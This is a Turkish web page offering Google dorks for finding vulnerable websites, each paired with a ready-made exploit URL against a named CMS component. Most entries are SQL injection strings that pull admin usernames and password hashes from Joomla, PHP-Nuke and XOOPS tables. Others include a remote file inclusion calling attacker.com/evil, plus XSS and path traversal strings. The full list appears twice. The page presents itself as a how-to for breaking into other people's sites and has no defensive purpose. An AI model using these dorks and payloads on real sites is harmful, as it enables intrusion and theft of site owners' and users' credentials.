Website Açık bulma (Google Dork ile)
Aşağıdaki kodları (Dorkları) arama motorunuza yapıştırıp arama yaparak belirtilen açıkların bulunduğu sitelere ulaşabilirsiniz
Exploit: /kmitaadmin/kmitat/htmlcode.php?file=http://attacker.com/evil?
Yöntemi: Shell
Panele yönlendirir.
Exploide:
/viewfaqs.php?cat=-1%20union%20select%20concat(id,0x3a,username,0x3a, password)%20from PHPAUCTIONXL_adminusers–
-Days-Booking Açığı
Dork: “allinurl:index.php?user=daysbooking”
Exploid: index.php?pid=-1%20union%20select%201,concat(id,0x3a,user,0x3a,pa ssword,0x3a,access,0x3a,email),3,4,5,6,7,8,9,0,1,2 ,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7 ,8,9,0,1,2%20from%20admin–&user=det
-Pn-Encyclopedia Açığı
Dork: allinurl:index.php?module=pnEncyclopedia
Exploide (1-2)
1- index.php?module=pnEncyclopedia&func=display_term& id=9999 union select 1,2,3,4,5,6,version(),8,9,10,11–
2- index.php?module=pnEncyclopedia&func=display_term& id=9999 union select 1,2,3,4,5,6,load_file
-Gamma Scripts Açığı
Dork : “BlogMe PHP created by Gamma Scripts”
Exploit : http://localhost/[BlogMe_path]/comments.php?id=-1 UNION SELECT 1,2,3,4,5,6,aes_decrypt(aes_encrypt(user(),0x71),0 x71)–
veya
http://localhost/[BlogMe_path]/comments.php?id=-1 UNION SELECT 1,2,unhex(hex(database())),4,5,6,7
-ASPapp Knowledge Base Açığı
Dork 1 – content_by_cat.asp?contentid ”catid”
Dork 2 – content_by_cat.asp? ”catid”
exploit-
content_by_cat.asp?contentid=99999999&catid=-99887766+UNION+SELECT+0,null,password,3,accessleve l,5,null,7,null,user_name+from+users
content_by_cat.asp?contentid=-99999999&catid=-99887766+union+select+0,null,password,3,accessleve l,5,null,7,8,user_name+from+users
-EmagiC CMS.Net v4.0 Açığı
Dork : inurl:emc.asp?pageid=
Exploit:
emc.asp?pageId=1′ UNION SELECT TOP 1 convert(int, password%2b’%20x’) FROM EMAGIC_LOGINS where username=”‘sa’–
-vlBook 1.21 Script Açığı
Script Download : http://home.vlab.info/vlbook_1.21.zip
DORK : “Powered by vlBook 1.21”
XSS Address : http://example/?l=” ********>alert(‘xss’)</script>
LFI Address : http://example/include/global.inc.php?l=../../../[FILE NAME]
-PHP-Nuke Siir Açığı
DORK 1 : allinurl:”modules.php?name”print
DORK 2 : allinurl:”modules.php?name=”Hikaye”
DORK 3: allinurl:”modules.php?name=”Fikralar”
DORK 4: allinurl:”modules.php?name=”bilgi”
EXPLOIT :
print&id=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/0,aid,0x3a,pwd,4/**/from+nuke_aut
-Com_JoomlaFlashfun Açığı
Dork: “com_joomlaflashfun”
Example:
http://xxx.net/2007/administrator/co…fig_live_site=[xxxx]
-Powered By The Black Lily 2007 Açığı
Dork : “Powered By The Black Lily 2007”
EXPLOIT:
http://victim.com/ar/products.php?cl…0from%20admin/*
veya
http://victim.com/en/products.php?cl…0from%20admin/*
-JUser Joomla Component 1.0.14 Açığı
Dork: inurl:com_juser
Exploit
http://localhost/path/administrator/…absolute_path=[evilcode]
-Rmsoft GS 2.0 Açığı
Dork: intext:Powered by RMSOFT GS 2.0 veya inurl:modules/rmgs/images.php
Exploit:
modules/rmgs/images.php?q=user&id=1999/**/union/**/all/**/select/**/1,1,concat(database(),0x202D20,user()),1,1,1,1,0,1 ,0,1,0,1,1,0,0,0,0,0,1,1,0,0,0,1,1,1,0,1,0,0/*
-Com-Na-Xxx Açığı
DORK 1 : allinurl:”com_na_content”
DORK 2 : allinurl:”com_na_bible”
DORK 3 : allinurl:”com_na_events”
DORK 4 : allinurl:”com_na_content”
DORK 5 : allinurl:”com_na_feedback”
DORK 6 : allinurl:”com_na_mydocs”
DORK 7 : allinurl:”com_na_churchmap”
DORK 8 : allinurl:”com_na_bibleinfo”
DORK 9 : allinurl:”com_na_dbs”
DORK 10 : allinurl:”com_na_udm”
DORK 11 : allinurl:”com_na_qforms”
DORK 12 : allinurl:”com_na_gallery2″
DORK 13 : allinurl:”com_na_publicrss”
DORK 14 : allinurl:”index.php?kwd”
EXPLOİT:
index.php?option=com_sermon&gid=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(username,0x3a,password),0,0,username,passwo rd%2C0%2C0%2C0/**/from/**/mos_users/*
-Com-Comments Açığı
Dork: “Review Script”, “Phil Taylor”
Exploit:
index.php?option=com_comments&task=view&id=-1+UNION+SELECT+0,999999,concat(username,0x3a,PASSW ORD),0,0,0,0,0,0+FROM+mos_users+union+select+*+fro m+mos_content_comments+where+1=1
-Portfolio Manager 1.0 Açığı
Dork: inurl:”index.php?option=com_portfolio”
Exploit:
http://site.com/index.php?option=com…rom+mos_users/*
-Com-Astatspro Açığı
Dork: allinurl: “com_astatspro”
PoC: administrator/components/com_astatspro/refer.php?id=-1/**/union/**/select/**/0,concat(username,0x3a,password,0x3a,usertype),con cat(username,0x3a,password,0x3a,usertype)/**/from/**/jos_users/*
Gelen sayfada sağ tıkla kaynağı görüntüle.
<H1>302 Moved</H1>
The ******** has moved <A HREF=”admin:c9cb9115e90580e14a0407ed1fcf8039:Super Administrator”>here</A>.
Bu bölümde md5 saklıdır.
-Modified By Fully Açığı
DORK : allinurl :kb.php?mode=article&k
DORK : “Powered by phpBB © 2001, 2006 phpBB Group” veya “Modified by Fully Modded phpBB © 2002, 2006”
EXPLOIT :
kb.php?mode=article&k=-1+union+select+1,1,concat(user_id,char(58),usernam e,char(58),user_password),4,5,6,7,8,9,10,11,12,13+ from+phpbb_users+where+user_id+=2&page_num=2&cat=1
-Easy-Clanpage v2.2 Açığı
Dork: “Easy-Clanpage v2.2″
Example -1/**/union/**/select/**/1,2,concat(username,0x3a,password),4,5,6,7/**/from/**/ecp_user/**/where/**/userid=1/*
-BM Classifieds Açığı
Dork 1 : ”showad.php?listingid=”
Dork 2 : ”pfriendly.php?ad=”
EXPLOIT:
showad.php?listingid=xCoRpiTx&cat=-99/**/union+select/**/concat(username,0x3a,email),password,2/**/from/**/users/*
pfriendly.php?ad=-99%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0 ,1,concat(username,0x3a,email),password,4,5,6,7,8, 9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25, 26,27%2F%2A%2A%2Ffrom%2F%2A%2A%2Fusers%2F%2A%2A%2F
-Porar WebBoart Açığı
DorK : ” webboard question.asp QID”
EXPLOIT:
question.asp?QID=-1122334455%20+%20union%20+%20select%20+%200,null,2 ,username,password,5,password,7,8,9,null%20+%20fro m%20+%20+%20administrator%20′;’;
-Com-Noticias Açığı
DorK : ”com_noticias”
EXPLOIT: index.php?option=com_noticias&Itemid=xcorpitx&task =detalhe&id=-99887766/**/union/**/%20select/**/0,concat##(username,0x3a,password,0x3a,email),2,3, 4,5/**/%20from/**/%20jos_users/*
-ASPapp -links.asp Açığı
dork – ”links.asp?CatId”
links.asp?CatId=-99999%20UNION%20SELECT%20null,accesslevel,null,nul l,user_name,%205%20,password,null%20FROM%20Users
admin login-
http://www.xxx.com/path/login.asp?re...Fadmin%2Easp%3 F
-Modules-Viso Açığı
DORKS 1 : allinurl :”modules/viso”
EXPLOIT 1 :
modules/viso/index.php?kid=-9999999/**/union/**/select/**/0,0x3a,uname,0x3a,0x3a,0x3a,pass/**/from/**/exv2_users/*where%20exv2_admin%201
EXPLOIT 2 :
modules/viso/index.php?kid=-9999999/**/union/**/select/**/0,0x3a,uname,0x3a,0x3a,0x3a,pass,pass/**/from/**/exv2_users
-Bookmarkx Script Açığı
DorK 1 : “2007 BookmarkX script”
DORK 2 : Powered by GengoliaWebStudio
DORK 3 : allinurl :”index.php?menu=showtopic”
EXPLOIT :
index.php?menu=showtopic&topicid=-1/**/UNION/**/ALL/**/SELECT/**/1,2,concat(auser,0x3a,apass),4,5,6/**/FROM/**/admin/*%20admin=1
veya;
index.php?menu=showtopic&topicid=-1/**/UNION/**/ALL/**/SELECT/**/1,2,concat(auser,0x3a,apass),4,5,6,7/**/FROM/**/admin/*%20admin=1
-Com-Profiler Açığı
DORK: allinurl:com_comprofiler
Exploit: /index.php?option=com_comprofiler&task=userProfile& user=[SQL]
Example: /index.php?option=com_comprofiler&task=userProfile& user=1/**/and/**/mid((select/**/password/**/from/**/jos_users/**/limit/**/0,1),1,1)/**/</**/Char(97)/*
-Com-Jpad Açığı
DORK: allinurl:com_jpad
Example: /index.php?option=com_jpad&task=edit&Itemid=39&cid=-1 UNION ALL SELECT 1,2,3,concat_ws(0x3a,username,password),5,6,7,8 from jos_users–
-PostSchedule Açığı
Google Dork : “PostSchedule ver 1”
Exploid:
index.php?module=PostSchedule&view=event&eid=-1′)+union+select+0,1,2,3,4,5,6,7,8,concat(pn_u name ,char(58),pn_pass),10,11,12,13/**/from/**/nuke_users/**/where/**/pn_uid=2/*
-joomla SQL Injection(Com-Jokes) Açığı
DorK : allinurl: “com_jokes”
EXPLOIT :
index.php?option=com_jokes&Itemid=bgh7&func=CatVie w&cat=-776655/**/union/**/select/**/0,1,2,3,username,5,password,7,8/**/from/**/mos_users/*
-Com_Estateagent Açığı
Dork : allinurl: “com_estateagent”
EXPLOIT :
index.php?option=com_estateagent&Itemid=bgh7&func= showObject&info=contact&objid=-9999/**/union/**/select/**/username,password/**/from/**/mos_us
-Com-Fq Açığı
DorK: allinurl: “com_fq”
EXPLOIT :
index.php?option=com_fq&Itemid=S@BUN&listid=999999 9/**/union/**/select/**/name,password/**/from/**/mos_users/*
-Com-Mamml Açığı
DorK : allinurl: “com_mamml”
EXPLOIT :
index.php?option=com_mamml&listid=9999999/**/union/**/select/**/name,password/**/from/**/mos_users/*
-joomla SQL Injection(com_gallery) Açığı
DORK : allinurl: com_gallery “func”
EXPLOIT 1 :
index.php?option=com_gallery&Itemid=0&func=detail& id=-99999/**/union/**/select/**/0,0,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,use rname/**/from/**/mos_users/*
EXPLOİT 2 :
index.php?option=com_gallery&Itemid=0&func=detail& id=-999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A %2F0%2C1%2Cpassword%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C 0%2C0%2C0%2Cusername%2F%2A%2A%2Ffrom%2F%2A%2A%2Fmo s_users
-Joomla Component Profiler Açığı
DORK: allinurl:com_comprofiler
Exploit: /index.php?option=com_comprofiler&task=userProfile& user=[SQL]
Example: /index.php?option=com_comprofiler&task=userProfile& user=1/**/and/**/mid((select/**/password/**/from/**/jos_users/**/limit/**/0,1),1,1)/**/</**/Char(97)/*
-Joomla Component Filiale SQL Injection Açığı
DORK : inurl:com_filiale
Exploit : /index.php?option=com_filiale&idFiliale=-5+union+select+1,password,3,4,username,6,7,8,9,10, 11+from+jos_users
-FlippingBook Açığı
DORK : inurl:com_flippingbook
Exploit :
/index.php?option=com_flippingbook&Itemid=28&book_i d=null/**/union/**/select/**/null,concat(username,0x3e,password),null,null,null ,null,null,null,null,null,null,null,null,null,null ,null,null,null,null,null,null,null,null,null,null ,null,null,null,null,null,null,null,null,null,null/**/from/**/jos_users/*
Pagenum Açığı
DORK : allinurl: ” list.php?pagenum”
EXPLOIT
list.php?pagenum=0&categoryid=1+union+select+111,2 22,concat_ws(char(58),login,password),444+from+adm in_login/*
-Modules-Tutorials Açığı
DORK 1 : allinurl :”/modules/tutorials/”
DORK 2 : allinurl :”/modules/tutorials/”tid
EXPLOIT 1 :
modules/tutorials/printpage.php?tid=-9999999/**/union/**/select/**/concat(uname,0x3a,pass),1,concat(uname,0x3a,pass), 3,4,5/**/from/**/xoops_users/*
EXPLOIT 2 :
modules/tutorials/index.php?op=printpage&tid=-9999999/**/union/**/select/**/0,1,concat(uname,0x3a,pass),3/**/from/**/xoops_users/*
-Modules-Glossaires Açığı
DORK : allinurl: “modules/glossaires”
EXPLOIT :
modules/glossaires/glossaires-p-f.php?op=ImprDef&sid=99999/**/union/**/select/**/000,pass,uname,pass/**/from/**/xoops_users/*where%20terme
-OsCommerce SQL Injection Açığı
Google Dork: inurl:”customer_testimonials.php”
Exploit:
http://site.com/customer_testimonial…rom+customers/*
Not: Aynı zamanda yönetici değilde bütün üyelerin md5 lerini karşınıza dizer.
-Tr Script News v2.1 Açığı
Google Dork: inurl:news.php?mode=voir
Exploid: news.php?mode=voir&nb=-1/**/UNION/**/SELECT/**/1,2,3,4,concat_ws(0x3a,pseudo,pass,email),6,7/**/from/**/tr_user_news/*
Admin girişi = /admin
-Com-Alberghi Açığı
DORK 1 : allinurl: “” detail
DORK 2 : allinurl: “com_alberghi”
EXPLOIT 1 :
index.php?option=com_alberghi&task=detail&Itemid=S @BUN&id=-99999/**/union/**/select/**/0,0,0x3a,0,0,0,0,0,0,0,0,11,12,1,1,1,1,1,1,1,1,2,2 ,2,2,2,2,2,2,2,2,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,con cat(username,0x3a,password)/**/from/**/jos_users/*
EXPLOIT 2 :
index.php?option=com_alberghi&task=detail&Itemid=S @BUN&id=-99999/**/union/**/select/**/0,0,0x3a,0,0,0,0,0,0,0,0,11,12,1,1,1,1,1,1,1,1,2,2 ,2,2,2,2,2,2,2,2,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3 ,3,3,3,concat(username,0x3a,password)/**/from/**/jos_users/*
-Powered By Joovideo V1.0 Açığı
DORK 1 : allinurl: “com_joovideo” detail
DORK 2 : allinurl: “com_joovideo”
DORK 3 : Powered by joovideo V1.0
EXPLOIT :
index.php?option=com_joovideo&Itemid=S@BUN&task=de tail&id=-99999/**/union/**/select/**/0,0,0x3a,0,0,0,0,0,0,0,1,1,1,1,1,1,1,1,1,1,2,2,2,2 ,2,concat(username,0x3a,password)/**/from/**/jos_users/*
-AllMy-Guests Script Açığı
Açığı bulunan script: AllMyGuests
Google Dork: “powered by AllMyGuests” (Tırnaklar yok)
Example (Exploid): http://site.de/allmyguest/index.php?…here+user_id=1–
-123 Flash Chat Açığı
DORKS : “123flashchat.php”
EXPLOITS :
http://localhost/path/123flashchat.php?e107path=Shell
-Kmita Tell Friend Açığı
Dork: “Powered by Kmita Tell Friend” veya “allinurl:/kmitat/”Exploit: /kmitaadmin/kmitat/htmlcode.php?file=http://attacker.com/evil?
Yöntemi: Shell
Panele yönlendirir.
-View-FAQ Açığı
Dork: Google : “allinurl:viewfaqs.php?cat=”Exploide:
/viewfaqs.php?cat=-1%20union%20select%20concat(id,0x3a,username,0x3a, password)%20from PHPAUCTIONXL_adminusers–
-Days-Booking Açığı
Dork: “allinurl:index.php?user=daysbooking”
Exploid: index.php?pid=-1%20union%20select%201,concat(id,0x3a,user,0x3a,pa ssword,0x3a,access,0x3a,email),3,4,5,6,7,8,9,0,1,2 ,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7 ,8,9,0,1,2%20from%20admin–&user=det
-Pn-Encyclopedia Açığı
Dork: allinurl:index.php?module=pnEncyclopedia
Exploide (1-2)
1- index.php?module=pnEncyclopedia&func=display_term& id=9999 union select 1,2,3,4,5,6,version(),8,9,10,11–
2- index.php?module=pnEncyclopedia&func=display_term& id=9999 union select 1,2,3,4,5,6,load_file
-Gamma Scripts Açığı
Dork : “BlogMe PHP created by Gamma Scripts”
Exploit : http://localhost/[BlogMe_path]/comments.php?id=-1 UNION SELECT 1,2,3,4,5,6,aes_decrypt(aes_encrypt(user(),0x71),0 x71)–
veya
http://localhost/[BlogMe_path]/comments.php?id=-1 UNION SELECT 1,2,unhex(hex(database())),4,5,6,7
-ASPapp Knowledge Base Açığı
Dork 1 – content_by_cat.asp?contentid ”catid”
Dork 2 – content_by_cat.asp? ”catid”
exploit-
content_by_cat.asp?contentid=99999999&catid=-99887766+UNION+SELECT+0,null,password,3,accessleve l,5,null,7,null,user_name+from+users
content_by_cat.asp?contentid=-99999999&catid=-99887766+union+select+0,null,password,3,accessleve l,5,null,7,8,user_name+from+users
-EmagiC CMS.Net v4.0 Açığı
Dork : inurl:emc.asp?pageid=
Exploit:
emc.asp?pageId=1′ UNION SELECT TOP 1 convert(int, password%2b’%20x’) FROM EMAGIC_LOGINS where username=”‘sa’–
-vlBook 1.21 Script Açığı
Script Download : http://home.vlab.info/vlbook_1.21.zip
DORK : “Powered by vlBook 1.21”
XSS Address : http://example/?l=” ********>alert(‘xss’)</script>
LFI Address : http://example/include/global.inc.php?l=../../../[FILE NAME]
-PHP-Nuke Siir Açığı
DORK 1 : allinurl:”modules.php?name”print
DORK 2 : allinurl:”modules.php?name=”Hikaye”
DORK 3: allinurl:”modules.php?name=”Fikralar”
DORK 4: allinurl:”modules.php?name=”bilgi”
EXPLOIT :
print&id=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/0,aid,0x3a,pwd,4/**/from+nuke_aut
-Com_JoomlaFlashfun Açığı
Dork: “com_joomlaflashfun”
Example:
http://xxx.net/2007/administrator/co…fig_live_site=[xxxx]
-Powered By The Black Lily 2007 Açığı
Dork : “Powered By The Black Lily 2007”
EXPLOIT:
http://victim.com/ar/products.php?cl…0from%20admin/*
veya
http://victim.com/en/products.php?cl…0from%20admin/*
-JUser Joomla Component 1.0.14 Açığı
Dork: inurl:com_juser
Exploit
http://localhost/path/administrator/…absolute_path=[evilcode]
-Rmsoft GS 2.0 Açığı
Dork: intext:Powered by RMSOFT GS 2.0 veya inurl:modules/rmgs/images.php
Exploit:
modules/rmgs/images.php?q=user&id=1999/**/union/**/all/**/select/**/1,1,concat(database(),0x202D20,user()),1,1,1,1,0,1 ,0,1,0,1,1,0,0,0,0,0,1,1,0,0,0,1,1,1,0,1,0,0/*
-Com-Na-Xxx Açığı
DORK 1 : allinurl:”com_na_content”
DORK 2 : allinurl:”com_na_bible”
DORK 3 : allinurl:”com_na_events”
DORK 4 : allinurl:”com_na_content”
DORK 5 : allinurl:”com_na_feedback”
DORK 6 : allinurl:”com_na_mydocs”
DORK 7 : allinurl:”com_na_churchmap”
DORK 8 : allinurl:”com_na_bibleinfo”
DORK 9 : allinurl:”com_na_dbs”
DORK 10 : allinurl:”com_na_udm”
DORK 11 : allinurl:”com_na_qforms”
DORK 12 : allinurl:”com_na_gallery2″
DORK 13 : allinurl:”com_na_publicrss”
DORK 14 : allinurl:”index.php?kwd”
EXPLOİT:
index.php?option=com_sermon&gid=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(username,0x3a,password),0,0,username,passwo rd%2C0%2C0%2C0/**/from/**/mos_users/*
-Com-Comments Açığı
Dork: “Review Script”, “Phil Taylor”
Exploit:
index.php?option=com_comments&task=view&id=-1+UNION+SELECT+0,999999,concat(username,0x3a,PASSW ORD),0,0,0,0,0,0+FROM+mos_users+union+select+*+fro m+mos_content_comments+where+1=1
-Portfolio Manager 1.0 Açığı
Dork: inurl:”index.php?option=com_portfolio”
Exploit:
http://site.com/index.php?option=com…rom+mos_users/*
-Com-Astatspro Açığı
Dork: allinurl: “com_astatspro”
PoC: administrator/components/com_astatspro/refer.php?id=-1/**/union/**/select/**/0,concat(username,0x3a,password,0x3a,usertype),con cat(username,0x3a,password,0x3a,usertype)/**/from/**/jos_users/*
Gelen sayfada sağ tıkla kaynağı görüntüle.
<H1>302 Moved</H1>
The ******** has moved <A HREF=”admin:c9cb9115e90580e14a0407ed1fcf8039:Super Administrator”>here</A>.
Bu bölümde md5 saklıdır.
-Modified By Fully Açığı
DORK : allinurl :kb.php?mode=article&k
DORK : “Powered by phpBB © 2001, 2006 phpBB Group” veya “Modified by Fully Modded phpBB © 2002, 2006”
EXPLOIT :
kb.php?mode=article&k=-1+union+select+1,1,concat(user_id,char(58),usernam e,char(58),user_password),4,5,6,7,8,9,10,11,12,13+ from+phpbb_users+where+user_id+=2&page_num=2&cat=1
-Easy-Clanpage v2.2 Açığı
Dork: “Easy-Clanpage v2.2″
Example -1/**/union/**/select/**/1,2,concat(username,0x3a,password),4,5,6,7/**/from/**/ecp_user/**/where/**/userid=1/*
-BM Classifieds Açığı
Dork 1 : ”showad.php?listingid=”
Dork 2 : ”pfriendly.php?ad=”
EXPLOIT:
showad.php?listingid=xCoRpiTx&cat=-99/**/union+select/**/concat(username,0x3a,email),password,2/**/from/**/users/*
pfriendly.php?ad=-99%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0 ,1,concat(username,0x3a,email),password,4,5,6,7,8, 9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25, 26,27%2F%2A%2A%2Ffrom%2F%2A%2A%2Fusers%2F%2A%2A%2F
-Porar WebBoart Açığı
DorK : ” webboard question.asp QID”
EXPLOIT:
question.asp?QID=-1122334455%20+%20union%20+%20select%20+%200,null,2 ,username,password,5,password,7,8,9,null%20+%20fro m%20+%20+%20administrator%20′;’;
-Com-Noticias Açığı
DorK : ”com_noticias”
EXPLOIT: index.php?option=com_noticias&Itemid=xcorpitx&task =detalhe&id=-99887766/**/union/**/%20select/**/0,concat##(username,0x3a,password,0x3a,email),2,3, 4,5/**/%20from/**/%20jos_users/*
-ASPapp -links.asp Açığı
dork – ”links.asp?CatId”
links.asp?CatId=-99999%20UNION%20SELECT%20null,accesslevel,null,nul l,user_name,%205%20,password,null%20FROM%20Users
admin login-
http://www.xxx.com/path/login.asp?re...Fadmin%2Easp%3 F
-Modules-Viso Açığı
DORKS 1 : allinurl :”modules/viso”
EXPLOIT 1 :
modules/viso/index.php?kid=-9999999/**/union/**/select/**/0,0x3a,uname,0x3a,0x3a,0x3a,pass/**/from/**/exv2_users/*where%20exv2_admin%201
EXPLOIT 2 :
modules/viso/index.php?kid=-9999999/**/union/**/select/**/0,0x3a,uname,0x3a,0x3a,0x3a,pass,pass/**/from/**/exv2_users
-Bookmarkx Script Açığı
DorK 1 : “2007 BookmarkX script”
DORK 2 : Powered by GengoliaWebStudio
DORK 3 : allinurl :”index.php?menu=showtopic”
EXPLOIT :
index.php?menu=showtopic&topicid=-1/**/UNION/**/ALL/**/SELECT/**/1,2,concat(auser,0x3a,apass),4,5,6/**/FROM/**/admin/*%20admin=1
veya;
index.php?menu=showtopic&topicid=-1/**/UNION/**/ALL/**/SELECT/**/1,2,concat(auser,0x3a,apass),4,5,6,7/**/FROM/**/admin/*%20admin=1
-Com-Profiler Açığı
DORK: allinurl:com_comprofiler
Exploit: /index.php?option=com_comprofiler&task=userProfile& user=[SQL]
Example: /index.php?option=com_comprofiler&task=userProfile& user=1/**/and/**/mid((select/**/password/**/from/**/jos_users/**/limit/**/0,1),1,1)/**/</**/Char(97)/*
-Com-Jpad Açığı
DORK: allinurl:com_jpad
Example: /index.php?option=com_jpad&task=edit&Itemid=39&cid=-1 UNION ALL SELECT 1,2,3,concat_ws(0x3a,username,password),5,6,7,8 from jos_users–
-PostSchedule Açığı
Google Dork : “PostSchedule ver 1”
Exploid:
index.php?module=PostSchedule&view=event&eid=-1′)+union+select+0,1,2,3,4,5,6,7,8,concat(pn_u name ,char(58),pn_pass),10,11,12,13/**/from/**/nuke_users/**/where/**/pn_uid=2/*
-joomla SQL Injection(Com-Jokes) Açığı
DorK : allinurl: “com_jokes”
EXPLOIT :
index.php?option=com_jokes&Itemid=bgh7&func=CatVie w&cat=-776655/**/union/**/select/**/0,1,2,3,username,5,password,7,8/**/from/**/mos_users/*
-Com_Estateagent Açığı
Dork : allinurl: “com_estateagent”
EXPLOIT :
index.php?option=com_estateagent&Itemid=bgh7&func= showObject&info=contact&objid=-9999/**/union/**/select/**/username,password/**/from/**/mos_us
-Com-Fq Açığı
DorK: allinurl: “com_fq”
EXPLOIT :
index.php?option=com_fq&Itemid=S@BUN&listid=999999 9/**/union/**/select/**/name,password/**/from/**/mos_users/*
-Com-Mamml Açığı
DorK : allinurl: “com_mamml”
EXPLOIT :
index.php?option=com_mamml&listid=9999999/**/union/**/select/**/name,password/**/from/**/mos_users/*
-joomla SQL Injection(com_gallery) Açığı
DORK : allinurl: com_gallery “func”
EXPLOIT 1 :
index.php?option=com_gallery&Itemid=0&func=detail& id=-99999/**/union/**/select/**/0,0,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,use rname/**/from/**/mos_users/*
EXPLOİT 2 :
index.php?option=com_gallery&Itemid=0&func=detail& id=-999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A %2F0%2C1%2Cpassword%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C 0%2C0%2C0%2Cusername%2F%2A%2A%2Ffrom%2F%2A%2A%2Fmo s_users
-Joomla Component Profiler Açığı
DORK: allinurl:com_comprofiler
Exploit: /index.php?option=com_comprofiler&task=userProfile& user=[SQL]
Example: /index.php?option=com_comprofiler&task=userProfile& user=1/**/and/**/mid((select/**/password/**/from/**/jos_users/**/limit/**/0,1),1,1)/**/</**/Char(97)/*
-Joomla Component Filiale SQL Injection Açığı
DORK : inurl:com_filiale
Exploit : /index.php?option=com_filiale&idFiliale=-5+union+select+1,password,3,4,username,6,7,8,9,10, 11+from+jos_users
-FlippingBook Açığı
DORK : inurl:com_flippingbook
Exploit :
/index.php?option=com_flippingbook&Itemid=28&book_i d=null/**/union/**/select/**/null,concat(username,0x3e,password),null,null,null ,null,null,null,null,null,null,null,null,null,null ,null,null,null,null,null,null,null,null,null,null ,null,null,null,null,null,null,null,null,null,null/**/from/**/jos_users/*
Pagenum Açığı
DORK : allinurl: ” list.php?pagenum”
EXPLOIT
list.php?pagenum=0&categoryid=1+union+select+111,2 22,concat_ws(char(58),login,password),444+from+adm in_login/*
-Modules-Tutorials Açığı
DORK 1 : allinurl :”/modules/tutorials/”
DORK 2 : allinurl :”/modules/tutorials/”tid
EXPLOIT 1 :
modules/tutorials/printpage.php?tid=-9999999/**/union/**/select/**/concat(uname,0x3a,pass),1,concat(uname,0x3a,pass), 3,4,5/**/from/**/xoops_users/*
EXPLOIT 2 :
modules/tutorials/index.php?op=printpage&tid=-9999999/**/union/**/select/**/0,1,concat(uname,0x3a,pass),3/**/from/**/xoops_users/*
-Modules-Glossaires Açığı
DORK : allinurl: “modules/glossaires”
EXPLOIT :
modules/glossaires/glossaires-p-f.php?op=ImprDef&sid=99999/**/union/**/select/**/000,pass,uname,pass/**/from/**/xoops_users/*where%20terme
-OsCommerce SQL Injection Açığı
Google Dork: inurl:”customer_testimonials.php”
Exploit:
http://site.com/customer_testimonial…rom+customers/*
Not: Aynı zamanda yönetici değilde bütün üyelerin md5 lerini karşınıza dizer.
-Tr Script News v2.1 Açığı
Google Dork: inurl:news.php?mode=voir
Exploid: news.php?mode=voir&nb=-1/**/UNION/**/SELECT/**/1,2,3,4,concat_ws(0x3a,pseudo,pass,email),6,7/**/from/**/tr_user_news/*
Admin girişi = /admin
-Com-Alberghi Açığı
DORK 1 : allinurl: “” detail
DORK 2 : allinurl: “com_alberghi”
EXPLOIT 1 :
index.php?option=com_alberghi&task=detail&Itemid=S @BUN&id=-99999/**/union/**/select/**/0,0,0x3a,0,0,0,0,0,0,0,0,11,12,1,1,1,1,1,1,1,1,2,2 ,2,2,2,2,2,2,2,2,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,con cat(username,0x3a,password)/**/from/**/jos_users/*
EXPLOIT 2 :
index.php?option=com_alberghi&task=detail&Itemid=S @BUN&id=-99999/**/union/**/select/**/0,0,0x3a,0,0,0,0,0,0,0,0,11,12,1,1,1,1,1,1,1,1,2,2 ,2,2,2,2,2,2,2,2,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3 ,3,3,3,concat(username,0x3a,password)/**/from/**/jos_users/*
-Powered By Joovideo V1.0 Açığı
DORK 1 : allinurl: “com_joovideo” detail
DORK 2 : allinurl: “com_joovideo”
DORK 3 : Powered by joovideo V1.0
EXPLOIT :
index.php?option=com_joovideo&Itemid=S@BUN&task=de tail&id=-99999/**/union/**/select/**/0,0,0x3a,0,0,0,0,0,0,0,1,1,1,1,1,1,1,1,1,1,2,2,2,2 ,2,concat(username,0x3a,password)/**/from/**/jos_users/*
-AllMy-Guests Script Açığı
Açığı bulunan script: AllMyGuests
Google Dork: “powered by AllMyGuests” (Tırnaklar yok)
Example (Exploid): http://site.de/allmyguest/index.php?…here+user_id=1–
-123 Flash Chat Açığı
DORKS : “123flashchat.php”
EXPLOITS :
http://localhost/path/123flashchat.php?e107path=Shell
Yorumlar
Yorum Gönder